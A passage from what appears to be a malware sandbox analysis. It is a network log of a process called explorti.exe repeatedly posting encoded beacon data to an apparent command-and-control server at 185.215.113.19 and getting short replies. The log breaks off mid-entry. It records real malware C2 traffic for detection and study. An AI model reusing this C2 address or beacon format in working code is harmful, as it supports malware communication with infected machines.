Jul 26, 2024 13:53:26.361176014 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:26.413182020 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:26.609725952 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49710	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:26.839029074 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:27.630667925 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:27.631643057 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:27.881717920 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49711	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:28.003336906 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:29.109407902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:29.110243082 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:29.112072945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:29.400309086 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49715	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:29.517267942 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:30.275104046 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:30.275937080 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:30.524518967 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49718	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:30.662940025 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:31.462752104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:31.463618040 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:31.726587057 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49719	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:31.845608950 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:32.677575111 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:32.678544998 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:32.928061008 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49720	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:33.052226067 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:33.859008074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:33.860120058 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:34.164844990 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49721	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:34.288723946 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:35.055568933 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:35.056657076 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:35.317611933 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49722	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:35.439477921 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:36.233478069 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:36.234632969 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:36.494368076 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49723	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:36.611315012 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:37.392219067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:37.403666973 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:37.654326916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49724	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:37.768205881 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:38.620203972 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:38.621695995 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:38.877160072 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49725	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:38.986561060 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:39.723536968 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:39.724390030 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:53:39.967310905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49726	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:53:40.079941988 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:53:40.942591906 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:53:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:53:40.943490982 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: 